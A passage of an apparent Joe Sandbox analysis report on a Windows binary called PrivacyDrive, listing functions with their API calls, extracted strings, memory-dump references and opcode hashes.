                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_memmove
                                • String ID: vector<T> too long
                                • API String ID: 2765667529-3788999226
                                • Opcode ID: a0cb8a74f22d01c1193fdf22690157da368f054645643d81268f044b33ab62f5
                                • Instruction ID: 21a0b09cad63bf26704fb02307bfcc50a0cc9e699095894007cefd2f8ff12292
                                • Opcode Fuzzy Hash: a0cb8a74f22d01c1193fdf22690157da368f054645643d81268f044b33ab62f5
                                • Instruction Fuzzy Hash: FB314F72B40615AFC710CF6CD981A6AFBA9FB88760F24823BE915C3380D735A915C7D5
                                Function 004018B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON
                                Download Yara Rule
                                APIs
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00401976
                                • _memmove.LIBCMT ref: 00401990
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_memmove
                                • String ID: vector<T> too long
                                • API String ID: 2765667529-3788999226
                                • Opcode ID: 89a72aa02af5b5b014c5f5594a3f225c1baa156e86108687fdb6d4f21da2613d
                                • Instruction ID: 312a17f11f13fec3570023aa0daaaf2ca619debc537378e2092afbdc1341ba46
                                • Opcode Fuzzy Hash: 89a72aa02af5b5b014c5f5594a3f225c1baa156e86108687fdb6d4f21da2613d
                                • Instruction Fuzzy Hash: CE31F7B2B006199FC710DF6CD980A6EFBA9EB84760B24833BE914D3380DA71E905C7D4
                                Function 004B28F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,0040FFE5,005BE234,?,?,?,?,?,004B23C7,0000000F,?,?,005BE234,?,0040FFE5,005BE28C), ref: 004B295A
                                • GetLocalTime.KERNEL32(?,?,?,?,?,?,004B23C7,0000000F,?,?,005BE234,?,0040FFE5,005BE28C), ref: 004B2980
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: LocalTime
                                • String ID: sober128
                                • API String ID: 481472006-251668517
                                • Opcode ID: 7ae08b3b09bde5d5889d6c27c374dc32762ebe5732c6ed2bae499653117a6084
                                • Instruction ID: 4ab76d2494170d6258972ab40fe464f147b326dd6bc94717d85ff97468a225f2
                                • Opcode Fuzzy Hash: 7ae08b3b09bde5d5889d6c27c374dc32762ebe5732c6ed2bae499653117a6084
                                • Instruction Fuzzy Hash: 5D41BFB5A006059BCB10DF28D881ABAB7B4BF4C300F11422EE849D7351EB74A959DB91
                                Function 0045E710 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                • _memmove.LIBCMT ref: 0045E7B5
                                  • Part of subcall function 0045E800: _memmove.LIBCMT ref: 0045E86C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: 4[P[$string too long
                                • API String ID: 4104443479-2375524141
                                • Opcode ID: 12f18fe5baf7a9690ccb309a3c17f90f572443e03d48b3260998b9ccead1cac4
                                • Instruction ID: da07d17d29a23d2e32459d0dccd0662c86c38c0c332d0b923a924280ac1c6841
                                • Opcode Fuzzy Hash: 12f18fe5baf7a9690ccb309a3c17f90f572443e03d48b3260998b9ccead1cac4
                                • Instruction Fuzzy Hash: 80310C353001105BC72C9E6ED88496AF7A9EF89751710492FFD9187782D734E949C398
                                Function 00477A80 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00545890,?,00000000,7563D392,?,?,00000000), ref: 00477B7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID: !@$\\?\
                                • API String ID: 823142352-284777618
                                • Opcode ID: 75004e505afe15a003c7fe243976181826576212db250104529b65a082d1a944
                                • Instruction ID: d1d1b29543399528dd67c618d7b47b03897f947de5fed18103c0eec115e4b199
                                • Opcode Fuzzy Hash: 75004e505afe15a003c7fe243976181826576212db250104529b65a082d1a944
                                • Instruction Fuzzy Hash: 7F4158B1D00248EBDF10DFA9D849BDEBBB4FF04318F10812AE424B7280D7756A08CBA5
                                Function 004753C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNEL32(HjG,?,00000020,00000000,7563D392), ref: 0047540A
                                • VirtualProtect.KERNEL32(HjG,?,00000000,00000000,00000002,HjG,?,00000000), ref: 00475435
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: HjG
                                • API String ID: 544645111-4133638772
                                • Opcode ID: f1e884a3b2631f5dd6f124811a1528878a932b6a2b8f4874528a006d90aee455
                                • Instruction ID: 5245b871116d1579b64f760935d460e980fb0fae71a921eb556ef9f14a67c246
                                • Opcode Fuzzy Hash: f1e884a3b2631f5dd6f124811a1528878a932b6a2b8f4874528a006d90aee455
                                • Instruction Fuzzy Hash: D811B472A04744ABDB10CF95DC44BAFBBB8EB46B25F10426AA928E7380E7755904C794
                                Function 004DF2F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: M
                                • API String ID: 4104443479-3526004983
                                • Opcode ID: abc80980bea67bdefa90ab877a5984b3a333246d66743f9a167aaa6be088c000
                                • Instruction ID: 20f0a4c349ed1b50f013f246a99e0d17de12b18f13d1139ffdb28d6563824e9c
                                • Opcode Fuzzy Hash: abc80980bea67bdefa90ab877a5984b3a333246d66743f9a167aaa6be088c000
                                • Instruction Fuzzy Hash: 42119172A01215AFDB21CFBCDD9899EBBE9EB40260B154636FC0AD7340E630AD14C691
                                Function 004DF250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: M
                                • API String ID: 4104443479-3526004983
                                • Opcode ID: 9a5ef0188f72c72e31162be544a562c4e45a299950b12565c771b5d168b507a3
                                • Instruction ID: b344f8583a08161a34cdcbcfe53798f2e690683bcaa104ce930973685c33b9a9
                                • Opcode Fuzzy Hash: 9a5ef0188f72c72e31162be544a562c4e45a299950b12565c771b5d168b507a3
                                • Instruction Fuzzy Hash: B7115B36A00109ABCB20CF98EC90A9E7BB9EF85350F144066EC09A7340D636AA55CBA1
                                Function 00485920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00485971
                                • GetVolumeInformationW.KERNEL32(?,?,00000104,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00485993
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InformationVolume_memset
                                • String ID: C:\
                                • API String ID: 3157072226-3404278061
                                • Opcode ID: 635f2170cec43ef065ba0954a08b62ab69aaca0ff061fcfdaded8806b9d6120a
                                • Instruction ID: d71efe12ed545dc3a141893c81f802d96d2a365eb777b89760df14d0d0ab5e1d
                                • Opcode Fuzzy Hash: 635f2170cec43ef065ba0954a08b62ab69aaca0ff061fcfdaded8806b9d6120a
                                • Instruction Fuzzy Hash: 68019B71B00318A7DB10DB95EC46F9E77B8FB48710F4041ABF504D7291EA74AA448B95
                                Function 0042DA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                Download Yara Rule
                                APIs
                                • UnregisterClassW.USER32(cbfx_ToolTipWnd,00000000), ref: 0042DA7D
                                • DeleteCriticalSection.KERNEL32(?,?,?,?,0053DED4,000000FF), ref: 0042DA9D
                                  • Part of subcall function 004CC6F0: ReleaseCapture.USER32 ref: 004CC7AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CaptureClassCriticalDeleteReleaseSectionUnregister
                                • String ID: cbfx_ToolTipWnd
                                • API String ID: 509205973-1218274383
                                • Opcode ID: e619c5eca145262e31b8a376ca729dd8f4ccbf9e88cd454fc6cae853a1958b74
                                • Instruction ID: 8c525298f3b4b57adc5f81e4ced5c874196da32faea43c23685c96fa3c3b8402
                                • Opcode Fuzzy Hash: e619c5eca145262e31b8a376ca729dd8f4ccbf9e88cd454fc6cae853a1958b74
                                • Instruction Fuzzy Hash: 4801D271904798ABD711CF58D80ABCEBBECFB09720F10425EE811A3380DBB86A04D795
                                Function 004A4000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33windowCOMMON
                                Download Yara Rule
                                APIs
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00402DC2,00000000,00000000,?,00000000), ref: 004A4020
                                • LocalFree.KERNEL32(00000000), ref: 004A404A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FormatFreeLocalMessage
                                • String ID: 0029
                                • API String ID: 1427518018-1198595668
                                • Opcode ID: 0328a4299f29ab1918295867bcf46d46f2e04cadb1dd41eb1905af3cac79d1f3
                                • Instruction ID: 8f35a0ec5d332d2d242128e332c30b03e661ac44e42e66c0bf61e782fd3eb577
                                • Opcode Fuzzy Hash: 0328a4299f29ab1918295867bcf46d46f2e04cadb1dd41eb1905af3cac79d1f3
                                • Instruction Fuzzy Hash: 59F06574790304BBFB30AA409C07FEF7A6CDB16B21F100155BA05B52D1D6F16E0096A9
                                Function 004FFB7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                Download Yara Rule
                                APIs
                                • std::exception::exception.LIBCMT ref: 004FFB90
                                  • Part of subcall function 00500A1E: std::exception::_Copy_str.LIBCMT ref: 00500A37
                                • __CxxThrowException@8.LIBCMT ref: 004FFBA5
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                • String ID: bad function call
                                • API String ID: 757275642-3612616537
                                • Opcode ID: e939e1992166924e7d78a0d036c551b19b6c440b9e89c0a9390d6e3ac44e945d
                                • Instruction ID: fdb6d91c183fb84b14b932bbeab6bcb8cd92e312a47191a9679c71e4bc926273
                                • Opcode Fuzzy Hash: e939e1992166924e7d78a0d036c551b19b6c440b9e89c0a9390d6e3ac44e945d
                                • Instruction Fuzzy Hash: CCD0E278D0020DABCF00EEA5C89A8CDBFA8BA44304F908062BC10A7281E674E2488B90